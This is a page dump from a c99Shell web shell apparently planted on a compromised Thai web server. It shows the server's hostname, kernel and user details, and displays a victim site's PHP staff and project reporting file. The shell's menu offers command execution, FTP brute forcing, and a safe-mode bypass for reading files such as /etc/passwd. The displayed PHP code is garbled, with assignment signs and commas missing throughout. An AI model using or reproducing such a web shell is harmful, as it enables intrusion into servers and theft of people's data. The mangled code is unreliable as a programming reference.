!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/ws_standard_on_mis/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     testdatabase2.php (20.84 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
/*
กำหนดค่า DSN หากฐานข้อมูลต้องการ User และ Password ก็ให้กำหนดด้วย 
เช่นจะใช้ DSN ชื่อ phptest ส่วน user และ password ไม่ใช้ก็ดังนี้ 

$dsn="asset";
$uid="";
$pwd="";


 ฟังก์ชันติดต่อ ต้องการให้ผ่านค่าทั้ง 3 เข้าไป และจะคืนค่าออกมา เราก็รับค่าที่คืนออกมาลงตัวแปร 
เช่นลงที่ hdn โดยที่หากติดต่อสำเร็จ hdn จะมีค่าเป็นหมายเลขบวกเพื่อนำใชกับฟังก์ชันอื่นต่อไป
หากติดต่อไม่ได้ hdn จะเป็นเท็จ ก็ควรจะมีการตรวจสอบว่า เป็นเท็จหรือไม่ 
หากใช่ก็จะได้ให้ลิกงานเลย แต่ในที่นี้ผมไม่ได้เขียนเอาไว้ ให้ทำเองครับ

$hdn = odbc_connect($dsn,$uid,$pwd);

// กำหนดคำสั่ง SQL ที่จะใช้ และใช้
$sql="select * from TAsset";
$fdn= odbc_exec($hdn, $sql);

//หาจำนวนคอลัมน์และนำชื่อคอลัมน์ออกมาแสดงไปทีละคอลัมน์
$nf= odbc_num_fields($fdn); 
echo "<table border=1><tr  bgcolor=skyblue align=center>";
for($i=1;$i<=$nf;$i++){ 
    echo "<td>",odbc_field_name($fdn,$i),"</td>";
    }
echo "</tr>";

// แสดงรายการไปทีละรายการ รายการละทีคอลัมน์จนกว่าจะหมด
while (odbc_fetch_row($fdn)){
for($i=1;$i<=$nf;$i++){ 
    echo "<td> ",odbc_result($fdn,$i),"</td>";
    }
echo "</tr>";
}
echo "</table>";

// ยกเลิก ปิดการติดต่อ
odbc_close($hdn);
*/
?>









<?

//$dsn="staff";

//$sql="select * from TEmployee, TWorkStatus where work_status.TEmployee=id.TWorkStatus";

?>
<hr>
<center>มาตราฐาน 3-1</center>
<br>
<?
$dsn_name "staff";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT *,TEmployee.id as tempid,TPrefix.name as prefixname FROM TEmployee,TWorkStatus,TPosScale,TPrefix WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TEmployee.Prefix_id=TPrefix.id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";

$sql "SELECT *,TEmployee.id as tempid,TPrefix.name as prefixname,TPosition.name as positionname FROM TEmployee,TWorkStatus,TPosScale,TPrefix,TPosition WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TEmployee.Prefix_id=TPrefix.id) and (TWorkStatus.id = '0') and (TPosScale.TPos_id=TPosition.id) and (TPosScale.TPos_id = '0014' or TPosScale.TPos_id = '0017') order by TEmployee.id";


$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");

$num odbc_num_rows($execute);
?>
<table border="1" width="800">
<tr> 
<td width=""> 
<div align="center">รหัส</div>
</td>
<td width=""> 
<div align="center">เลขบัตร</div>
</td>
<td width=""> 
<div align="center">เลขตำแหน่ง</div>
</td>
<td width=""> 
<div align="center">ชื่อตำแหน่ง</div>
</td>
<td width=""> 
<div align="center">คำนำหน้า</div>
</td>
<td width=""> 
<div align="center">name</div>
</td>
<td width=""> 
<div align="center">surname</div>
</td>
<td width=""> 
<div align="center">วันที่เริ่มงาน</div>
</td>
<td width=""> 
<div align="center">อายุการทำงาน</div>
</td>
</tr>

<? 
$i=1;
$num1=0;
while(odbc_fetch_row($execute,$i))
{
    $num1++;

$id=odbc_result($execute,"temp_id");
$idx=odbc_result($execute,"idx");
$TPos_id=odbc_result($execute,"TPos_id");
$positionname=odbc_result($execute,"positionname");
$prefixname=odbc_result($execute,"prefixname");
$name=odbc_result($execute,"fname");
$surname=odbc_result($execute,"lname");
$in_date=odbc_result($execute,"trans_date");
    $datenow=date("Y-m");
            $datenow_Month substr($datenow52); 
            $datenow_Month sprintf("%01d"$datenow_Month);
            $datenow_Year substr($datenow04); 
            $datenow="$datenow_Year-$datenow_Month";
    $datecheck=$in_date;
$in_date_num=0;
    if($in_date!="")
    {

        $i2=1;
        $n=3;
        while ($i2!=$n)
        {
            $datecheck_Date substr($datecheck82); 
            $datecheck_Date sprintf("%01d"$datecheck_Date);
            $datecheck_Month substr($datecheck52); 
            $datecheck_Month sprintf("%01d"$datecheck_Month);
            $datecheck_Year substr($datecheck04); 
        
                $datecheck mktime(0,0,0,$datecheck_Month+1,$datecheck_Date,$datecheck_Year);
                $datecheck date("Y-m-d",$datecheck);

                $datecheck_Month substr($datecheck52); 
                $datecheck_Month sprintf("%01d"$datecheck_Month);
                $datecheck_Year substr($datecheck04); 
                $datecheck2="$datecheck_Year-$datecheck_Month";

//echo"$datecheck $datecheck2 $datenow<br>";
$in_date_num++;
            if($datecheck2==$datenow)
            {
                $n=1;
            }
        }
    }
?>

<tr> 
<td width=""> 
<div align="center"> 
<? echo "$id"?>
</div>
</td>
<td width=""> 
<div align="center"> 
<? echo "$idx"?>
</div>
</td>
<td width=""> 
<div align="center"> 
<? echo "$TPos_id"?>
</div>
</td>
<td width=""> 
<div align="center"> 
<? echo "$positionname"?>
</div>
</td>
<td width=""> 
<div align="center"> 
<? echo "$prefixname"?>
</div>
</td>
<td width=""> 
<? echo "$name"?>
</td>
<td width=""> 
<? echo "$surname"?>
</td>
<td width=""> 
<? echo "$in_date"?>
</td>
<td width=""> 
<? echo "$in_date_num"?>
</td>
</tr>

<?
$i++;
}
?>
</table>
<?
echo "$num  $num1";
?>
<?
odbc_close($connect);
?>
<hr>







<?
//-------------------------------------โครงการ
$dsn_name "project";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//2008-06-01,2009-04-31
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT TProject.id as a, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id FROM TProject, TTypeProject, TTypeProjectSub WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01')";
//$sql = "SELECT * FROM TProject";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
//$num = odbc_num_rows($execute);odbc_num_fields 
$num odbc_num_fields($execute);
?>
<table border="1" width="">
<tr> 
<td width=""> 
<div align="center">รหัสกิจกรรม</div>
</td>
<td width=""> 
<div align="center">ชื่อกิจกรรม ไทย</div>
</td>
<td width=""> 
<div align="center">ชื่อกิจกรรม อังกฤษ</div>
</td>
<td width=""> 
<div align="center">ชื่อประเ้ภทกิจกรรม</div>
</td>
<td width=""> 
<div align="center">ชื่อประเ้ภทกิจกรรมย่อย</div>
</td>
<td width=""> 
<div align="center">วันที่เริ่มกิจกรรม</div>
</td>
</tr>

<? 
$i=1;
$num1=0;
while($row odbc_fetch_array($execute))
{
$TProject_id=$row['a'];
$TProject_NameT=$row["NameT"];
$TProject_NameE=$row["NameE"];
$TProject_Type_id=$row["Type_id"];
$TProject_TypeSub_id=$row["TypeSub_id"];
$TProject_sdate=$row["sdate"];
$sql2 "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')";
//$sql = "SELECT * FROM TProject";
$execute2 odbc_exec($connect$sql2) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row2 odbc_fetch_array($execute2))
{
    $TTypeProject_id=$row2["id"];
    $TTypeProject_name=$row2["name"];
}

$sql3 "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')";
//$sql = "SELECT * FROM TProject";
$execute3 odbc_exec($connect$sql3) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row3 odbc_fetch_array($execute3))
{
    $TTypeProjectSub_id=$row3["id"];
    $TTypeProjectSub_name=$row3["name"];
}

$num1++;


//$name_t=odbc_result($execute,"NameT");
//$name_e=odbc_result($execute,"NameE");
//$type_id=odbc_result($execute,"TTypeProject.id");
//$type_name=odbc_result($execute,"TTypeProject.name");
//$typesub_id=odbc_result($execute,"TTypeProjectSub.id");
//$typesub_name=odbc_result($execute,"TTypeProjectSub.name");
?>

<tr> 
<td width=""> 
<div align="center"> 
<? echo "$TProject_id"?>
</div>
</td>
<td width=""> 
<? echo "$TProject_NameT"?>
</td>
<td width=""> 
<? echo "$TProject_NameE"?>
</td>
<td width=""> 
<? echo "$TTypeProject_id $TTypeProject_name"?>
</td>
<td width=""> 
<? echo "$TTypeProjectSub_id $TTypeProjectSub_name"?>
</td>
<td width=""> 
<? echo "$TProject_sdate"?>
</td>
</tr>

<?
$i++;
}
?>
</table>
<?
echo "$num $num1";
?>
<?
odbc_close($connect);
?>

<hr>
<center>มาตราฐาน 3-2</center>
<br>

<?
//-------------------------------------------------------------------------มาตราฐาน 3.2
$dsn_name "staff";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT * FROM TFileCommittee, TEmployee WHERE  TFileCommittee.TEmp_id=TEmployee.Id";
$sql "SELECT *,TEmployee.id as tempid FROM TFileCommittee, TEmployee,TWorkStatus,TPosScale WHERE  TFileCommittee.TEmp_id=TEmployee.Id and (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";

//$sql = "SELECT *,TEmployee.id as temp_id FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";

//$sql = "SELECT * FROM TProject";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="">
<tr> 
<th width=""> 
รหัสอาจารย์
</th>
<th width=""> 
ชื่ออาจารย์
</th>
<th width=""> 
นามสกุลอาจารย์
</th>
<th width=""> 
ลำดับ
</th>
<th width=""> 
ชื่อเรื่อง
</th>

</tr>

<? 
$i=1;
$num1=0;
while($row odbc_fetch_array($execute))
{
$TEmployee_id=$row['tempid'];
$TEmployee_fname=$row["fname"];
$TEmployee_lname=$row["lname"];
$TFileCommittee_order_no=$row["order_no"];
$TFileCommittee_ttile=$row["TTitle"];






//$name_t=odbc_result($execute,"NameT");
//$name_e=odbc_result($execute,"NameE");
//$type_id=odbc_result($execute,"TTypeProject.id");
//$type_name=odbc_result($execute,"TTypeProject.name");
//$typesub_id=odbc_result($execute,"TTypeProjectSub.id");
//$typesub_name=odbc_result($execute,"TTypeProjectSub.name");

if($TEmployee_id!=$TEmployee_id_check)
    {
$num1++;
?>

<tr> 
<td width=""> 
<div align="center"> 
<? echo "$TEmployee_id"?>
</div>
</td>
<td width=""> 
<? echo "$TEmployee_fname"?>
</td>
<td width=""> 
<? echo "$TEmployee_lname"?>
</td>
<td width=""> 
<? echo "$TFileCommittee_order_no"?>
</td>
<td width=""> 
<? echo "$TFileCommittee_ttile"?>
</td>
</tr>

<?
    $TEmployee_id_check=$TEmployee_id;
    }
//------------------------------------------------------------------------------------
else
    {
?>

<tr> 
<td width=""> 
<div align="center"> 
<? echo ""?>
</div>
</td>
<td width=""> 
<? echo ""?>
</td>
<td width=""> 
<? echo ""?>
</td>
<td width=""> 
<? echo "$TFileCommittee_order_no"?>
</td>
<td width=""> 
<? echo "$TFileCommittee_ttile"?>
</td>
</tr>

<?
    $TEmployee_id_check=$TEmployee_id;
    }
$i++;
}
?>
</table>
<?
echo "$num1";
?>
<?
odbc_close($connect);
?>
<hr>
<center>มาตราฐาน 3-4</center>
<br>







<?
//-------------------------------------------------------------------------มาตราฐาน 3.4
$dsn_name "staff";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="371">
<tr> 
<td width="32"> 
<div align="center">id</div>
</td>
<td width="132"> 
<div align="center">name</div>
</td>
<td width="185"> 
<div align="center">surname</div>
</td>
</tr>
</table>
<? 
$i=1;
$num1=0;
while(odbc_fetch_row($execute,$i))
{
    $num1++;
$id=odbc_result($execute,"id");
$name=odbc_result($execute,"fname");
$surname=odbc_result($execute,"lname");
?>
<table border="1" width="370">
<tr> 
<td width="35"> 
<div align="center"> 
<? echo "$id"?>
</div>
</td>
<td width="129"> 
<? echo "$name"?>
</td>
<td width="184"> 
<? echo "$surname"?>
</td>
</tr>
</table>
<?
$i++;
}

echo "$num1";
?>
<?
odbc_close($connect);
?>

<hr>
<?
//-------------------------------------โครงการ
$dsn_name "project";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT TProject.id as a, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id, TProject.budget3 , TProject.budget4 FROM TProject, TTypeProject, TTypeProjectSub WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01') ";
//$sql = "SELECT * FROM TProject";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="">
<tr> 
<td width="184"> 
<div align="center">รหัสกิจกรรม</div>
</td>
<td width="400"> 
<div align="center">ชื่อกิจกรรม ไทย</div>
</td>
<td width="184"> 
<div align="center">ชื่อกิจกรรม อังกฤษ</div>
</td>
<td width="184"> 
<div align="center">ชื่อประเ้ภทกิจกรรม</div>
</td>
<td width="184"> 
<div align="center">ค่าใช้จ่าย</div>
</td>
<td width="184"> 
<div align="center">มูลค่า</div>
</td>
</tr>
</table>
<? 
$i=1;
$num1=0;
$price_budget3=0;
$price_budget4=0;
while($row odbc_fetch_array($execute))
{
$TProject_id=$row['a'];
$TProject_NameT=$row["NameT"];
$TProject_NameE=$row["NameE"];
$TProject_Type_id=$row["Type_id"];
$TProject_TypeSub_id=$row["TypeSub_id"];

$TProject_budget3=$row['budget3'];
$TProject_budget4=$row['budget4'];
$price_budget3=$price_budget3+$TProject_budget3;
$price_budget4=$price_budget4+$TProject_budget4;

$sql2 "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')";
//$sql = "SELECT * FROM TProject";
$execute2 odbc_exec($connect$sql2) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row2 odbc_fetch_array($execute2))
{
    $TTypeProject_id=$row2["id"];
    $TTypeProject_name=$row2["name"];
}

$sql3 "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')";
//$sql = "SELECT * FROM TProject";
$execute3 odbc_exec($connect$sql3) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row3 odbc_fetch_array($execute3))
{
    $TTypeProjectSub_id=$row3["id"];
    $TTypeProjectSub_name=$row3["name"];
}

$num1++;


//$name_t=odbc_result($execute,"NameT");
//$name_e=odbc_result($execute,"NameE");
//$type_id=odbc_result($execute,"TTypeProject.id");
//$type_name=odbc_result($execute,"TTypeProject.name");
//$typesub_id=odbc_result($execute,"TTypeProjectSub.id");
//$typesub_name=odbc_result($execute,"TTypeProjectSub.name");
?>
<table border="1" width="">
<tr> 
<td width="184"> 
<div align="center"> 
<? echo "$TProject_id"?>
</div>
</td>
<td width="400"> 
<? echo "$TProject_NameT"?>
</td>
<td width="184"> 
<? echo "$TProject_NameE"?>
</td>
<td width="184"> 
<? echo "$TTypeProject_id $TTypeProject_name"?>
</td>
<td width="184"> 
<? echo "$TProject_budget3"?>
</td>
<td width="184"> 
<? echo "$TProject_budget4"?>
</td>
</tr>
</table>
<?
$i++;
}

echo "$num1 ราคาค่าใช้จ่าย$price_budget3 มูลค่า$price_budget4";
?>
<?
odbc_close($connect);
?>




<?
//-------------------------------------------------------------------------มาตราฐาน 3.6
$dsn_name "staff";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="371">
<tr> 
<td width="32"> 
<div align="center">id</div>
</td>
<td width="132"> 
<div align="center">name</div>
</td>
<td width="185"> 
<div align="center">surname</div>
</td>
</tr>
</table>
<? 
$i=1;
$num1=0;
while(odbc_fetch_row($execute,$i))
{
    $num1++;
$id=odbc_result($execute,"id");
$name=odbc_result($execute,"fname");
$surname=odbc_result($execute,"lname");
?>
<table border="1" width="370">
<tr> 
<td width="35"> 
<div align="center"> 
<? echo "$id"?>
</div>
</td>
<td width="129"> 
<? echo "$name"?>
</td>
<td width="184"> 
<? echo "$surname"?>
</td>
</tr>
</table>
<?
$i++;
}

echo "$num1";
?>
<?
odbc_close($connect);
?>

<hr>
<?
//-------------------------------------โครงการ
$dsn_name "project";
$username =""
$password =""
$connectodbc_connect($dsn_name$username$password) or die("ติดต่อ DSN ไม่ได้"); 
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
//$sql = "SELECT * FROM TEmployee,TWorkStatus,TPosScale WHERE (TEmployee.work_status=TWorkStatus.id) and (TEmployee.Id=TPosScale.TEmp_id) and (TWorkStatus.id = '0')  and (TEmployee.id like '01%') and (TPosScale.TDep_id = '0702')";
$sql "SELECT TProject.id as a, TProject.NameT ,TProject.NameE ,TProject.Type_id, TProject.TypeSub_id, TProject.budget3 , TProject.budget4, TProject.budget2 FROM TProject, TTypeProject, TTypeProjectSub WHERE (TProject.Type_id=TTypeProject.id) and (TProject.TypeSub_id=TTypeProjectSub.id)and (TProject.Type_id='1') and (TProject.TypeSub_id='01') ";
//$sql = "SELECT * FROM TProject";
$execute odbc_exec($connect$sql) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
$num odbc_num_rows($execute);
?>
<table border="1" width="">
<tr> 
<th width=""> 
<div align="center">รหัสกิจกรรม</div>
</th>
<th width=""> 
<div align="center">ชื่อกิจกรรม ไทย</div>
</th>
<th width=""> 
<div align="center">ชื่อกิจกรรม อังกฤษ</div>
</th>
<th width=""> 
<div align="center">ชื่อประเ้ภทกิจกรรม</div>
</th>
<th width=""> 
<div align="center">รายรับ</div>
</th>

</tr>

<? 
$i=1;
$num1=0;
$price_budget2=0;
$price_budget3=0;
$price_budget4=0;
while($row odbc_fetch_array($execute))
{
$TProject_id=$row['a'];
$TProject_NameT=$row["NameT"];
$TProject_NameE=$row["NameE"];
$TProject_Type_id=$row["Type_id"];
$TProject_TypeSub_id=$row["TypeSub_id"];

$TProject_budget2=$row['budget2'];
$TProject_budget3=$row['budget3'];
$TProject_budget4=$row['budget4'];

$price_budget2=$price_budget2+$TProject_budget2;
$price_budget3=$price_budget3+$TProject_budget3;
$price_budget4=$price_budget4+$TProject_budget4;

$sql2 "SELECT * FROM TTypeProject WHERE (id='$TProject_Type_id')";
//$sql = "SELECT * FROM TProject";
$execute2 odbc_exec($connect$sql2) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row2 odbc_fetch_array($execute2))
{
    $TTypeProject_id=$row2["id"];
    $TTypeProject_name=$row2["name"];
}

$sql3 "SELECT * FROM TTypeProjectSub WHERE (id='$TProject_TypeSub_id')";
//$sql = "SELECT * FROM TProject";
$execute3 odbc_exec($connect$sql3) or die ("เอ็กซิคิวส์คำสั่งไม่ได้");
while($row3 odbc_fetch_array($execute3))
{
    $TTypeProjectSub_id=$row3["id"];
    $TTypeProjectSub_name=$row3["name"];
}

$num1++;


//$name_t=odbc_result($execute,"NameT");
//$name_e=odbc_result($execute,"NameE");
//$type_id=odbc_result($execute,"TTypeProject.id");
//$type_name=odbc_result($execute,"TTypeProject.name");
//$typesub_id=odbc_result($execute,"TTypeProjectSub.id");
//$typesub_name=odbc_result($execute,"TTypeProjectSub.name");
?>

<tr> 
<td width=""> 
<div align="center"> 
<? echo "$TProject_id"?>
</div>
</td>
<td width=""> 
<? echo "$TProject_NameT"?>
</td>
<td width=""> 
<? echo "$TProject_NameE"?>
</td>
<td width=""> 
<? echo "$TTypeProject_id $TTypeProject_name"?>
</td>
<td width=""> 
<? echo "$TProject_budget2"?>
</td>

</tr>

<?
$i++;
}
?>
</table>
<?
echo "$num1 รายรับ$price_budget2";
?>
<?
odbc_close($connect);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0095 ]--